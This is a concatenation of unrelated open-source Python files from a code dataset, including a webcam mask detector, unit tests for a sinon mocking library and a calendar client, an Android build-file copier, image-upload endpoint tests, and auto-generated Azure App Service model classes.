        entered = int(input('Enter the Account Number: '))
        if entered != self.accountnumber:
            print("Wrong Number")
        else:
            print("The Balance is: $" + str(self.balance))
| StarcoderdataPython |
5099756 | <filename>client/commands.py
from enum import Enum
class Command(Enum):
    """Wire commands understood by the client.

    The enum *value* is the literal command word; ``Command(value)`` on
    any unrecognized word yields :attr:`DEFAULT` via ``_missing_``.
    """
    ADD_USER = "adduser"
    PASSWORD = "<PASSWORD>"
    LIST = "list"
    LEADERS = "leaders"
    LOGIN = "login"
    LOGOUT = "logout"
    BEGIN = "begin"
    SEND = "send"
    DELAY = "delay"
    END = "end"
    EXIT = "exit"
    DEFAULT = "default"
    SKIP = ""  # empty input line

    @classmethod
    def _missing_(cls, value):
        # Lookup fallback: map unknown values to DEFAULT instead of
        # raising ValueError.
        return Command.DEFAULT
| StarcoderdataPython |
9699262 | # -*- coding: utf-8 -*-
"""
Created on Thu Nov 19 18:04:12 2020
@author: hamil
"""
# Import the libraries required to build the algorithm
from tensorflow.keras.applications.mobilenet_v2 import preprocess_input
from tensorflow.keras.preprocessing.image import img_to_array
from tensorflow.keras.models import load_model
from imutils.video import VideoStream
import imutils
import numpy as np
import cv2
import os
def detectar_mascara(frame, faceNet, maskNet):
    """Detect faces in *frame* and classify each as mask / no-mask.

    Returns ``(locs, preds)``: face bounding boxes
    ``(startX, startY, endX, endY)`` and the matching ``maskNet``
    predictions (both empty when no face passes the 0.5 confidence
    threshold).
    """
    # Build a 300x300 blob from the frame for the SSD face detector.
    (h, w) = frame.shape[:2]
    bolha = cv2.dnn.blobFromImage(
        frame, 1.0, (300, 300), (104.0, 177.0, 123.0))
    faceNet.setInput(bolha)
    detector = faceNet.forward()
    print(detector.shape)  # NOTE(review): debug output left in on purpose?
    faces = []
    locs = []
    preds = []
    for i in range(0, detector.shape[2]):
        # Confidence score of the i-th detection.
        confidence = detector[0, 0, i, 2]
        if confidence > 0.5:
            # Scale the normalized box back to frame coordinates and
            # clamp it inside the image bounds.
            box = detector[0, 0, i, 3:7] * np.array([w, h, w, h])
            (startX, startY, endX, endY) = box.astype("int")
            (startX, startY) = (max(0, startX), max(0, startY))
            (endX, endY) = (min(w - 1, endX), min(h - 1, endY))
            # Crop the face, convert BGR->RGB and preprocess for the
            # MobileNetV2-based classifier (224x224 input).
            face = frame[startY:endY, startX:endX]
            face = cv2.cvtColor(face, cv2.COLOR_BGR2RGB)
            face = cv2.resize(face, (224, 224))
            face = img_to_array(face)
            face = preprocess_input(face)
            faces.append(face)
            locs.append((startX, startY, endX, endY))
    if len(faces) > 0:
        # Classify all detected faces in a single batched prediction.
        faces = np.array(faces, dtype = "float32")
        preds = maskNet.predict(faces, batch_size = 12)
    return (locs, preds)
# Load the Caffe face detector and the trained mask classifier, then run
# live classification on the default webcam until 'q' is pressed.
prototipoPath = r"D:\ProjectMultimidia\ProjectMultimidia\detector_face\deploy.prototxt"
pesosPatch = r"D:\ProjectMultimidia\ProjectMultimidia\detector_face\res10_300x300_ssd_iter_140000.caffemodel"
faceNet = cv2.dnn.readNet(prototipoPath, pesosPatch)
maskNet = load_model("D:\ProjectMultimidia\ProjectMultimidia\detector_mascara.model")
print("[INFO] Iniciando stream de vídeo")
vs = VideoStream(src = 0).start()
while True:
    frame = vs.read()
    frame = imutils.resize(frame, width = 400)
    (locs, preds) = detectar_mascara(frame, faceNet, maskNet)
    for (box, pred) in zip(locs, preds):
        (startX, startY, endX, endY) = box
        (mask, withoutMask) = pred
        # Green label/box for mask, red for no mask.
        label = "Mask" if mask > withoutMask else "No Mask"
        color = (0, 255, 0) if label == "Mask" else (0, 0, 255)
        label = "{} : {:.2f}%".format(label, max(mask, withoutMask) * 100)
        cv2.putText(frame, label, (startX, startY - 10),
                    cv2.FONT_HERSHEY_SIMPLEX, 0.45, color, 2)
        cv2.rectangle(frame, (startX, startY), (endX, endY), color, 2)
    cv2.imshow("Frame", frame)
    key = cv2.waitKey(1) & 0xFF
    # Quit on 'q'.
    if key == ord("q"):
        break
cv2.destroyAllWindows()
vs.stop()
| StarcoderdataPython |
4813129 | <gh_stars>10-100
import sys
sys.path.insert(0, '../')
import unittest
import lib.base as sinon
from lib.matcher import SinonMatcher
from lib.spy import SinonSpy
from lib.stub import SinonStub
"""
======================================================
FOR TEST ONLY START
======================================================
"""
# build-in module
import os
# customized class
class A_object(object):
    """Fixture class used as a spy/stub target in the tests below."""
    # class function
    def A_func(self):
        pass
# global function
def B_func():
    """Module-level fixture function used as a spy/stub target."""
    pass
from TestClass import ForTestOnly
"""
======================================================
FOR TEST ONLY END
======================================================
"""
class TestSinonMatcher(unittest.TestCase):
    """Unit tests for :class:`SinonMatcher`.

    Numbering groups the cases: 00x constructors, 02x unary matchers
    (any/defined/truthy/falsy/bool), 030-051 factory matchers
    (same/typeOf/instanceOf), 060+ combinators (and_match/or_match).
    """

    def setUp(self):
        # Reset sinon's global scope before each test.
        sinon.g = sinon.init(globals())

    def test001_constructor_number(self):
        m = SinonMatcher(1)
        self.assertTrue(m.mtest(1))
        self.assertFalse(m.mtest(2))

    def test002_constructor_strcmp_string(self):
        # Default string comparison is substring containment.
        m = SinonMatcher("match string", strcmp="default")
        self.assertTrue(m.mtest("match"))
        self.assertTrue(m.mtest("ch st"))
        self.assertTrue(m.mtest("match string"))
        self.assertFalse(m.mtest("match string++"))
        self.assertFalse(m.mtest("match strig"))

    def test003_constructor_strcmp_regex(self):
        m = SinonMatcher(r"(\w*) (\w*)", strcmp="regex")
        self.assertFalse(m.mtest("match"))
        self.assertTrue(m.mtest("ch st"))
        self.assertTrue(m.mtest("match string"))
        self.assertTrue(m.mtest("match string++"))
        self.assertTrue(m.mtest("match strig"))

    def test004_constructor_func(self):
        # A custom callable becomes the test function itself.
        def custom_test_func(a, b, c):
            return a+b+c
        m = SinonMatcher(custom_test_func, is_custom_func=True)
        self.assertEqual(m.mtest(1,2,3), 6)
        m = SinonMatcher(r"(\w*) (\w*)", strcmp="regex")
        self.assertFalse(m.mtest("match"))

    def test005_constructor_func_invalid(self):
        something = "Not Function"
        with self.assertRaises(Exception) as context:
            m = SinonMatcher(something, is_custom_func=True)

    def test006_constructor_strcmp_invalid(self):
        something = 123
        with self.assertRaises(Exception) as context:
            m = SinonMatcher(something, strcmp="default")

    def test020_any(self):
        m = SinonMatcher.any
        self.assertTrue(m.mtest())
        self.assertTrue(m.mtest(123))
        self.assertTrue(m.mtest(self))
        self.assertTrue(m.mtest("asd"))

    def test021_defined(self):
        m = SinonMatcher.defined
        self.assertFalse(m.mtest())
        self.assertFalse(m.mtest(None))
        self.assertTrue(m.mtest([]))
        self.assertTrue(m.mtest(['1']))
        self.assertTrue(m.mtest(""))
        self.assertTrue(m.mtest("1"))

    def test022_truthy(self):
        m = SinonMatcher.truthy
        self.assertFalse(m.mtest())
        self.assertTrue(m.mtest(True))
        self.assertFalse(m.mtest(False))
        self.assertFalse(m.mtest("asd"))

    def test023_falsy(self):
        m = SinonMatcher.falsy
        self.assertFalse(m.mtest())
        self.assertFalse(m.mtest(True))
        self.assertTrue(m.mtest(False))
        self.assertFalse(m.mtest("asd"))

    def test024_bool(self):
        m = SinonMatcher.bool
        self.assertFalse(m.mtest())
        self.assertTrue(m.mtest(True))
        self.assertTrue(m.mtest(False))
        self.assertFalse(m.mtest("asd"))

    def test30_same(self):
        m = SinonMatcher.same("100")
        self.assertTrue(m.mtest("100"))
        m = SinonMatcher.same(100)
        self.assertTrue(m.mtest(100))
        m = SinonMatcher.same(os.system)
        self.assertTrue(m.mtest(os.system))

    def test40_typeOf_class(self):
        # This is a silly test, normal condition will not use this kinda cases.
        fto = ForTestOnly()
        m = SinonMatcher.typeOf(type)
        self.assertTrue(m.mtest(ForTestOnly)) # class is a type
        self.assertFalse(m.mtest(fto)) # instance is not a type

    def test41_typeOf_instance(self):
        fto = ForTestOnly()
        m = SinonMatcher.typeOf(ForTestOnly)
        self.assertFalse(m.mtest(ForTestOnly))
        self.assertTrue(m.mtest(fto))

    def test42_typeOf_value(self):
        m = SinonMatcher.typeOf(int)
        self.assertFalse(m.mtest("1")) # string is not a number
        self.assertTrue(m.mtest(1)) # number is a number

    def test43_typeOf_invalid_type(self):
        with self.assertRaises(Exception) as context:
            m = SinonMatcher.typeOf(123)

    def test50_instanceOf_class(self):
        # instanceOf must reject a class argument (instances only).
        fto = ForTestOnly()
        with self.assertRaises(Exception) as context:
            m = SinonMatcher.instanceOf(ForTestOnly)

    def test51_instanceOf_instance(self):
        spy = SinonSpy()
        stub = SinonStub()
        m = SinonMatcher.instanceOf(spy)
        self.assertTrue(m.mtest(spy))
        self.assertTrue(m.mtest(stub))

    def test060_and_match(self):
        spy = SinonSpy()
        stub = SinonStub()
        m = SinonMatcher.instanceOf(spy).and_match(SinonMatcher.instanceOf(stub))
        self.assertFalse(m.mtest(spy))
        self.assertTrue(m.mtest(stub))

    def test061_or_match(self):
        m = SinonMatcher.typeOf(int).or_match(SinonMatcher.typeOf(str))
        self.assertTrue(m.mtest("1"))
        self.assertTrue(m.mtest(1))
        self.assertFalse(m.mtest())
        self.assertFalse(m.mtest([1, "1"]))
| StarcoderdataPython |
351710 | """Test for event_manager.py."""
from datetime import datetime, timedelta, timezone
from googleapiclient.http import HttpMock
from showroomeventscheduler.google.calendar.event import Event
from showroomeventscheduler.google.calendar.event_manager import EventManager
class TestEventManager:
    """Test for EventManager."""

    @staticmethod
    def test_register(resource_path_root):
        """Smoke test."""
        creds = None
        calendar_id = "calendar_id"
        # HttpMock replays a canned Google API response, so no network
        # access or real credentials are needed.
        http = HttpMock(filename=(resource_path_root / "event_insert_response.json"), headers={"status": "200"},)
        event_manager = EventManager(creds, calendar_id, http=http)
        event = Event(
            "test",
            datetime(2021, 7, 22, 23, 55, 0, 0, timezone(timedelta(hours=+9), "JST")),
            datetime(2021, 7, 23, 0, 25, 0, 0, timezone(timedelta(hours=+9), "JST")),
        )
        event_manager.register(event)

    @staticmethod
    def test_check(resource_path_root):
        """check() against a canned non-empty event list."""
        creds = None
        calendar_id = "calendar_id"
        http = HttpMock(filename=(resource_path_root / "event_list_response.json"), headers={"status": "200"},)
        event_manager = EventManager(creds, calendar_id, http=http)
        event_manager.check()

    @staticmethod
    def test_check_empty(resource_path_root):
        """check() against a canned empty event list."""
        creds = None
        calendar_id = "calendar_id"
        http = HttpMock(filename=(resource_path_root / "event_list_response_empty.json"), headers={"status": "200"},)
        event_manager = EventManager(creds, calendar_id, http=http)
        event_manager.check()
| StarcoderdataPython |
4867375 | #!/usr/bin/env python2
import os
import shutil
DIR='build'
BUILD_ID_MK = '/'.join((DIR, 'core', 'build_id.mk'))
VERSION_MK = '/'.join((DIR, 'core', 'version_defaults.mk'))
def checkout(tag):
    """Check out git *tag* inside the DIR working tree.

    NOTE(review): the tag is interpolated unquoted into a shell command;
    fine for the trusted local tag file, unsafe for arbitrary input.
    """
    os.system('(cd %s; git checkout %s)'%(DIR, tag))
def get_level():
    """Return PLATFORM_SDK_VERSION parsed from VERSION_MK, or '0' if absent.

    Fix: the file handle was previously opened and never closed; a
    ``with`` block now guarantees closure on every path.
    """
    with open(VERSION_MK) as fh:
        for line in fh:
            line = line.strip()
            if not line.startswith('PLATFORM_SDK_VERSION'):
                continue
            # Value is whatever follows the last '=' on the line.
            return line.split('=')[-1].strip()
    return '0'
def copy_build_files(level):
    """Copy BUILD_ID_MK and VERSION_MK into api-<level>/build/core.

    Fix: the previous bare ``except: pass`` around ``makedirs`` swallowed
    every error (permissions, bad path, ...), not just "already exists";
    an explicit existence check keeps the intent without hiding failures.
    """
    dest = '/'.join(('api-' + level, 'build', 'core'))
    if not os.path.isdir(dest):
        os.makedirs(dest)
    for f in (BUILD_ID_MK, VERSION_MK):
        shutil.copy(f, dest)
# Drive: for each tag listed in DIR/tag, check it out, read its SDK
# level and archive the two build files under api-<level>/build/core.
for line in open('/'.join((DIR, 'tag'))):
    tag = line.strip()
    checkout(tag)
    level = get_level()
    print(level)
    copy_build_files(level)
| StarcoderdataPython |
5146662 | <gh_stars>1-10
# Copyright edalize contributors
# Licensed under the 2-Clause BSD License, see LICENSE for details.
# SPDX-License-Identifier: BSD-2-Clause
import os.path
from edalize.edatool import Edatool
from edalize.nextpnr import Nextpnr
from edalize.yosys import Yosys
from edalize.flows.icestorm import Icestorm as Icestorm2
class Icestorm(Edatool):
    """Backward-compatibility wrapper around the edalize icestorm *flow*.

    All real work is delegated to :class:`edalize.flows.icestorm.Icestorm`
    (imported as ``Icestorm2``).  Fixes: removed the unused local
    ``_tool_opts`` in ``__init__`` and the "Arachnhe" typo in the option
    description.
    """

    argtypes = ["vlogdefine", "vlogparam"]

    @classmethod
    def get_doc(cls, api_ver):
        """Return the tool documentation dict for EDAM API version 0."""
        if api_ver == 0:
            options = {
                "members": [
                    {
                        "name": "pnr",
                        "type": "String",
                        "desc": "Select Place & Route tool. Legal values are *arachne* for Arachne-PNR, *next* for nextpnr or *none* to only perform synthesis. Default is next",
                    },
                ],
                "lists": [
                    {
                        "name": "arachne_pnr_options",
                        "type": "String",
                        "desc": "Additional options for Arachne PNR",
                    },
                    {
                        "name": "frontends",
                        "type": "String",
                        "desc": "fixme",
                    },
                ],
            }
            # Merge in options contributed by the underlying tools.
            Edatool._extend_options(options, Yosys)
            Edatool._extend_options(options, Nextpnr)
            return {
                "description": "Open source toolchain for Lattice iCE40 FPGAs. Uses yosys for synthesis and arachne-pnr or nextpnr for Place & Route",
                "members": options["members"],
                "lists": options["lists"],
            }

    def __init__(self, edam=None, work_root=None, eda_api=None, verbose=True):
        super().__init__(edam, work_root, eda_api, verbose)
        # Re-home the legacy tool options under the flow-options key and
        # delegate to the flow-based implementation.
        edam["flow_options"] = edam["tool_options"]["icestorm"]
        self.icestorm = Icestorm2(edam, work_root, verbose)

    def configure_main(self):
        self.icestorm.configure()

    def build_pre(self):
        # Build steps are handled entirely by the flow API.
        pass

    def build_post(self):
        pass
| StarcoderdataPython |
8098152 | <filename>tests/test_upload.py<gh_stars>0
import os
import requests
def test_upload_image():
    """A valid JPEG upload must be accepted with HTTP 200.

    Fix: the image file was opened and never closed; a ``with`` block now
    keeps it open exactly for the duration of the request.
    """
    test_dir = "./tests/test_img"
    filename = "living-room.jpg"
    with open(os.path.join(test_dir, filename), 'rb') as fh:
        file = {
            "image": (os.path.basename(filename), fh)
        }
        response = requests.post(url='http://localhost:5000', files=file)
    assert response.status_code == 200
def test_invalid_file_extensions():
    """A non-image upload must be rejected with 422 Unprocessable Entity."""
    file = {
        "image": ("dummy.txt", b"This is a fake", "rb")
    }
    response = requests.post(url='http://localhost:5000', files=file)
    assert response.status_code == 422
# test cases
# gimme.bashrc.jpeg
# gimme.jpeg.bashrc
def test_hello():
    """The /hello endpoint must answer with the exact greeting body."""
    reply = requests.get(url='http://localhost:5000/hello')
    assert reply.content == b"Hello world!"
| StarcoderdataPython |
129553 | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
import msrest.serialization
class AddressResponse(msrest.serialization.Model):
    """Describes main public IP address and any extra virtual IPs.

    :param service_ip_address: Main public virtual IP.
    :type service_ip_address: str
    :param internal_ip_address: Virtual Network internal IP address of the App Service Environment
     if it is in internal load-balancing mode.
    :type internal_ip_address: str
    :param outbound_ip_addresses: IP addresses appearing on outbound connections.
    :type outbound_ip_addresses: list[str]
    :param vip_mappings: Additional virtual IPs.
    :type vip_mappings: list[~azure.mgmt.web.v2016_09_01.models.VirtualIPMapping]
    """

    # Maps Python attribute names to wire-format JSON keys/types for msrest.
    _attribute_map = {
        'service_ip_address': {'key': 'serviceIpAddress', 'type': 'str'},
        'internal_ip_address': {'key': 'internalIpAddress', 'type': 'str'},
        'outbound_ip_addresses': {'key': 'outboundIpAddresses', 'type': '[str]'},
        'vip_mappings': {'key': 'vipMappings', 'type': '[VirtualIPMapping]'},
    }

    def __init__(
        self,
        **kwargs
    ):
        super(AddressResponse, self).__init__(**kwargs)
        self.service_ip_address = kwargs.get('service_ip_address', None)
        self.internal_ip_address = kwargs.get('internal_ip_address', None)
        self.outbound_ip_addresses = kwargs.get('outbound_ip_addresses', None)
        self.vip_mappings = kwargs.get('vip_mappings', None)
class ApiDefinitionInfo(msrest.serialization.Model):
    """Information about the formal API definition for the app.

    :param url: The URL of the API definition.
    :type url: str
    """

    # Wire-format mapping for msrest serialization.
    _attribute_map = {
        'url': {'key': 'url', 'type': 'str'},
    }

    def __init__(
        self,
        **kwargs
    ):
        super(ApiDefinitionInfo, self).__init__(**kwargs)
        self.url = kwargs.get('url', None)
class AppServiceEnvironmentCollection(msrest.serialization.Model):
    """Collection of App Service Environments.

    Variables are only populated by the server, and will be ignored when sending a request.

    All required parameters must be populated in order to send to Azure.

    :param value: Required. Collection of resources.
    :type value: list[~azure.mgmt.web.v2016_09_01.models.AppServiceEnvironmentResource]
    :ivar next_link: Link to next page of resources.
    :vartype next_link: str
    """

    # 'required'/'readonly' constraints enforced by msrest at (de)serialization time.
    _validation = {
        'value': {'required': True},
        'next_link': {'readonly': True},
    }

    _attribute_map = {
        'value': {'key': 'value', 'type': '[AppServiceEnvironmentResource]'},
        'next_link': {'key': 'nextLink', 'type': 'str'},
    }

    def __init__(
        self,
        **kwargs
    ):
        super(AppServiceEnvironmentCollection, self).__init__(**kwargs)
        self.value = kwargs['value']
        # Server-populated; always sent as None by the client.
        self.next_link = None
class ProxyOnlyResource(msrest.serialization.Model):
    """Azure proxy only resource. This resource is not tracked by Azure Resource Manager.

    Variables are only populated by the server, and will be ignored when sending a request.

    :ivar id: Resource Id.
    :vartype id: str
    :ivar name: Resource Name.
    :vartype name: str
    :param kind: Kind of resource.
    :type kind: str
    :ivar type: Resource type.
    :vartype type: str
    """

    _validation = {
        'id': {'readonly': True},
        'name': {'readonly': True},
        'type': {'readonly': True},
    }

    _attribute_map = {
        'id': {'key': 'id', 'type': 'str'},
        'name': {'key': 'name', 'type': 'str'},
        'kind': {'key': 'kind', 'type': 'str'},
        'type': {'key': 'type', 'type': 'str'},
    }

    def __init__(
        self,
        **kwargs
    ):
        super(ProxyOnlyResource, self).__init__(**kwargs)
        # id/name/type are read-only and server-populated.
        self.id = None
        self.name = None
        self.kind = kwargs.get('kind', None)
        self.type = None
class AppServiceEnvironmentPatchResource(ProxyOnlyResource):
    """ARM resource for a app service environment.

    Variables are only populated by the server, and will be ignored when sending a request.

    :ivar id: Resource Id.
    :vartype id: str
    :ivar name: Resource Name.
    :vartype name: str
    :param kind: Kind of resource.
    :type kind: str
    :ivar type: Resource type.
    :vartype type: str
    :param name_properties_name: Name of the App Service Environment.
    :type name_properties_name: str
    :param location: Location of the App Service Environment, e.g. "West US".
    :type location: str
    :ivar provisioning_state: Provisioning state of the App Service Environment. Possible values
     include: "Succeeded", "Failed", "Canceled", "InProgress", "Deleting".
    :vartype provisioning_state: str or ~azure.mgmt.web.v2016_09_01.models.ProvisioningState
    :ivar status: Current status of the App Service Environment. Possible values include:
     "Preparing", "Ready", "Scaling", "Deleting".
    :vartype status: str or ~azure.mgmt.web.v2016_09_01.models.HostingEnvironmentStatus
    :param vnet_name: Name of the Virtual Network for the App Service Environment.
    :type vnet_name: str
    :param vnet_resource_group_name: Resource group of the Virtual Network.
    :type vnet_resource_group_name: str
    :param vnet_subnet_name: Subnet of the Virtual Network.
    :type vnet_subnet_name: str
    :param virtual_network: Description of the Virtual Network.
    :type virtual_network: ~azure.mgmt.web.v2016_09_01.models.VirtualNetworkProfile
    :param internal_load_balancing_mode: Specifies which endpoints to serve internally in the
     Virtual Network for the App Service Environment. Possible values include: "None", "Web",
     "Publishing".
    :type internal_load_balancing_mode: str or
     ~azure.mgmt.web.v2016_09_01.models.InternalLoadBalancingMode
    :param multi_size: Front-end VM size, e.g. "Medium", "Large".
    :type multi_size: str
    :param multi_role_count: Number of front-end instances.
    :type multi_role_count: int
    :param worker_pools: Description of worker pools with worker size IDs, VM sizes, and number of
     workers in each pool.
    :type worker_pools: list[~azure.mgmt.web.v2016_09_01.models.WorkerPool]
    :param ipssl_address_count: Number of IP SSL addresses reserved for the App Service
     Environment.
    :type ipssl_address_count: int
    :ivar database_edition: Edition of the metadata database for the App Service Environment, e.g.
     "Standard".
    :vartype database_edition: str
    :ivar database_service_objective: Service objective of the metadata database for the App
     Service Environment, e.g. "S0".
    :vartype database_service_objective: str
    :ivar upgrade_domains: Number of upgrade domains of the App Service Environment.
    :vartype upgrade_domains: int
    :ivar subscription_id: Subscription of the App Service Environment.
    :vartype subscription_id: str
    :param dns_suffix: DNS suffix of the App Service Environment.
    :type dns_suffix: str
    :ivar last_action: Last deployment action on the App Service Environment.
    :vartype last_action: str
    :ivar last_action_result: Result of the last deployment action on the App Service Environment.
    :vartype last_action_result: str
    :ivar allowed_multi_sizes: List of comma separated strings describing which VM sizes are
     allowed for front-ends.
    :vartype allowed_multi_sizes: str
    :ivar allowed_worker_sizes: List of comma separated strings describing which VM sizes are
     allowed for workers.
    :vartype allowed_worker_sizes: str
    :ivar maximum_number_of_machines: Maximum number of VMs in the App Service Environment.
    :vartype maximum_number_of_machines: int
    :ivar vip_mappings: Description of IP SSL mapping for the App Service Environment.
    :vartype vip_mappings: list[~azure.mgmt.web.v2016_09_01.models.VirtualIPMapping]
    :ivar environment_capacities: Current total, used, and available worker capacities.
    :vartype environment_capacities: list[~azure.mgmt.web.v2016_09_01.models.StampCapacity]
    :param network_access_control_list: Access control list for controlling traffic to the App
     Service Environment.
    :type network_access_control_list:
     list[~azure.mgmt.web.v2016_09_01.models.NetworkAccessControlEntry]
    :ivar environment_is_healthy: True/false indicating whether the App Service Environment is
     healthy.
    :vartype environment_is_healthy: bool
    :ivar environment_status: Detailed message about with results of the last check of the App
     Service Environment.
    :vartype environment_status: str
    :ivar resource_group: Resource group of the App Service Environment.
    :vartype resource_group: str
    :param front_end_scale_factor: Scale factor for front-ends.
    :type front_end_scale_factor: int
    :ivar default_front_end_scale_factor: Default Scale Factor for FrontEnds.
    :vartype default_front_end_scale_factor: int
    :param api_management_account_id: API Management Account associated with the App Service
     Environment.
    :type api_management_account_id: str
    :param suspended: :code:`<code>true</code>` if the App Service Environment is suspended;
     otherwise, :code:`<code>false</code>`. The environment can be suspended, e.g. when the
     management endpoint is no longer available
     (most likely because NSG blocked the incoming traffic).
    :type suspended: bool
    :param dynamic_cache_enabled: True/false indicating whether the App Service Environment is
     suspended. The environment can be suspended e.g. when the management endpoint is no longer
     available
     (most likely because NSG blocked the incoming traffic).
    :type dynamic_cache_enabled: bool
    :param cluster_settings: Custom settings for changing the behavior of the App Service
     Environment.
    :type cluster_settings: list[~azure.mgmt.web.v2016_09_01.models.NameValuePair]
    :param user_whitelisted_ip_ranges: User added ip ranges to whitelist on ASE db.
    :type user_whitelisted_ip_ranges: list[str]
    """

    # Read-only constraints: these fields are server-populated and are
    # never serialized from the client.
    _validation = {
        'id': {'readonly': True},
        'name': {'readonly': True},
        'type': {'readonly': True},
        'provisioning_state': {'readonly': True},
        'status': {'readonly': True},
        'database_edition': {'readonly': True},
        'database_service_objective': {'readonly': True},
        'upgrade_domains': {'readonly': True},
        'subscription_id': {'readonly': True},
        'last_action': {'readonly': True},
        'last_action_result': {'readonly': True},
        'allowed_multi_sizes': {'readonly': True},
        'allowed_worker_sizes': {'readonly': True},
        'maximum_number_of_machines': {'readonly': True},
        'vip_mappings': {'readonly': True},
        'environment_capacities': {'readonly': True},
        'environment_is_healthy': {'readonly': True},
        'environment_status': {'readonly': True},
        'resource_group': {'readonly': True},
        'default_front_end_scale_factor': {'readonly': True},
    }

    # Wire-format mapping; 'properties.*' keys are flattened ARM envelope
    # properties.
    _attribute_map = {
        'id': {'key': 'id', 'type': 'str'},
        'name': {'key': 'name', 'type': 'str'},
        'kind': {'key': 'kind', 'type': 'str'},
        'type': {'key': 'type', 'type': 'str'},
        'name_properties_name': {'key': 'properties.name', 'type': 'str'},
        'location': {'key': 'properties.location', 'type': 'str'},
        'provisioning_state': {'key': 'properties.provisioningState', 'type': 'str'},
        'status': {'key': 'properties.status', 'type': 'str'},
        'vnet_name': {'key': 'properties.vnetName', 'type': 'str'},
        'vnet_resource_group_name': {'key': 'properties.vnetResourceGroupName', 'type': 'str'},
        'vnet_subnet_name': {'key': 'properties.vnetSubnetName', 'type': 'str'},
        'virtual_network': {'key': 'properties.virtualNetwork', 'type': 'VirtualNetworkProfile'},
        'internal_load_balancing_mode': {'key': 'properties.internalLoadBalancingMode', 'type': 'str'},
        'multi_size': {'key': 'properties.multiSize', 'type': 'str'},
        'multi_role_count': {'key': 'properties.multiRoleCount', 'type': 'int'},
        'worker_pools': {'key': 'properties.workerPools', 'type': '[WorkerPool]'},
        'ipssl_address_count': {'key': 'properties.ipsslAddressCount', 'type': 'int'},
        'database_edition': {'key': 'properties.databaseEdition', 'type': 'str'},
        'database_service_objective': {'key': 'properties.databaseServiceObjective', 'type': 'str'},
        'upgrade_domains': {'key': 'properties.upgradeDomains', 'type': 'int'},
        'subscription_id': {'key': 'properties.subscriptionId', 'type': 'str'},
        'dns_suffix': {'key': 'properties.dnsSuffix', 'type': 'str'},
        'last_action': {'key': 'properties.lastAction', 'type': 'str'},
        'last_action_result': {'key': 'properties.lastActionResult', 'type': 'str'},
        'allowed_multi_sizes': {'key': 'properties.allowedMultiSizes', 'type': 'str'},
        'allowed_worker_sizes': {'key': 'properties.allowedWorkerSizes', 'type': 'str'},
        'maximum_number_of_machines': {'key': 'properties.maximumNumberOfMachines', 'type': 'int'},
        'vip_mappings': {'key': 'properties.vipMappings', 'type': '[VirtualIPMapping]'},
        'environment_capacities': {'key': 'properties.environmentCapacities', 'type': '[StampCapacity]'},
        'network_access_control_list': {'key': 'properties.networkAccessControlList', 'type': '[NetworkAccessControlEntry]'},
        'environment_is_healthy': {'key': 'properties.environmentIsHealthy', 'type': 'bool'},
        'environment_status': {'key': 'properties.environmentStatus', 'type': 'str'},
        'resource_group': {'key': 'properties.resourceGroup', 'type': 'str'},
        'front_end_scale_factor': {'key': 'properties.frontEndScaleFactor', 'type': 'int'},
        'default_front_end_scale_factor': {'key': 'properties.defaultFrontEndScaleFactor', 'type': 'int'},
        'api_management_account_id': {'key': 'properties.apiManagementAccountId', 'type': 'str'},
        'suspended': {'key': 'properties.suspended', 'type': 'bool'},
        'dynamic_cache_enabled': {'key': 'properties.dynamicCacheEnabled', 'type': 'bool'},
        'cluster_settings': {'key': 'properties.clusterSettings', 'type': '[NameValuePair]'},
        'user_whitelisted_ip_ranges': {'key': 'properties.userWhitelistedIpRanges', 'type': '[str]'},
    }

    def __init__(
        self,
        **kwargs
    ):
        super(AppServiceEnvironmentPatchResource, self).__init__(**kwargs)
        self.name_properties_name = kwargs.get('name_properties_name', None)
        self.location = kwargs.get('location', None)
        self.provisioning_state = None
        self.status = None
        self.vnet_name = kwargs.get('vnet_name', None)
        self.vnet_resource_group_name = kwargs.get('vnet_resource_group_name', None)
        self.vnet_subnet_name = kwargs.get('vnet_subnet_name', None)
        self.virtual_network = kwargs.get('virtual_network', None)
        self.internal_load_balancing_mode = kwargs.get('internal_load_balancing_mode', None)
        self.multi_size = kwargs.get('multi_size', None)
        self.multi_role_count = kwargs.get('multi_role_count', None)
        self.worker_pools = kwargs.get('worker_pools', None)
        self.ipssl_address_count = kwargs.get('ipssl_address_count', None)
        self.database_edition = None
        self.database_service_objective = None
        self.upgrade_domains = None
        self.subscription_id = None
        self.dns_suffix = kwargs.get('dns_suffix', None)
        self.last_action = None
        self.last_action_result = None
        self.allowed_multi_sizes = None
        self.allowed_worker_sizes = None
        self.maximum_number_of_machines = None
        self.vip_mappings = None
        self.environment_capacities = None
        self.network_access_control_list = kwargs.get('network_access_control_list', None)
        self.environment_is_healthy = None
        self.environment_status = None
        self.resource_group = None
        self.front_end_scale_factor = kwargs.get('front_end_scale_factor', None)
        self.default_front_end_scale_factor = None
        self.api_management_account_id = kwargs.get('api_management_account_id', None)
        self.suspended = kwargs.get('suspended', None)
        self.dynamic_cache_enabled = kwargs.get('dynamic_cache_enabled', None)
        self.cluster_settings = kwargs.get('cluster_settings', None)
        self.user_whitelisted_ip_ranges = kwargs.get('user_whitelisted_ip_ranges', None)
class Resource(msrest.serialization.Model):
    """Azure resource. This resource is tracked in Azure Resource Manager.

    Variables are only populated by the server, and will be ignored when sending a request.

    All required parameters must be populated in order to send to Azure.

    :ivar id: Resource Id.
    :vartype id: str
    :ivar name: Resource Name.
    :vartype name: str
    :param kind: Kind of resource.
    :type kind: str
    :param location: Required. Resource Location.
    :type location: str
    :ivar type: Resource type.
    :vartype type: str
    :param tags: A set of tags. Resource tags.
    :type tags: dict[str, str]
    """

    _validation = {
        'id': {'readonly': True},
        'name': {'readonly': True},
        'location': {'required': True},
        'type': {'readonly': True},
    }

    _attribute_map = {
        'id': {'key': 'id', 'type': 'str'},
        'name': {'key': 'name', 'type': 'str'},
        'kind': {'key': 'kind', 'type': 'str'},
        'location': {'key': 'location', 'type': 'str'},
        'type': {'key': 'type', 'type': 'str'},
        'tags': {'key': 'tags', 'type': '{str}'},
    }

    def __init__(
        self,
        **kwargs
    ):
        super(Resource, self).__init__(**kwargs)
        self.id = None
        self.name = None
        self.kind = kwargs.get('kind', None)
        # 'location' is required; KeyError here mirrors the generated contract.
        self.location = kwargs['location']
        self.type = None
        self.tags = kwargs.get('tags', None)
class AppServiceEnvironmentResource(Resource):
    """App Service Environment ARM resource.
    Variables are only populated by the server, and will be ignored when sending a request.
    All required parameters must be populated in order to send to Azure.
    :ivar id: Resource Id.
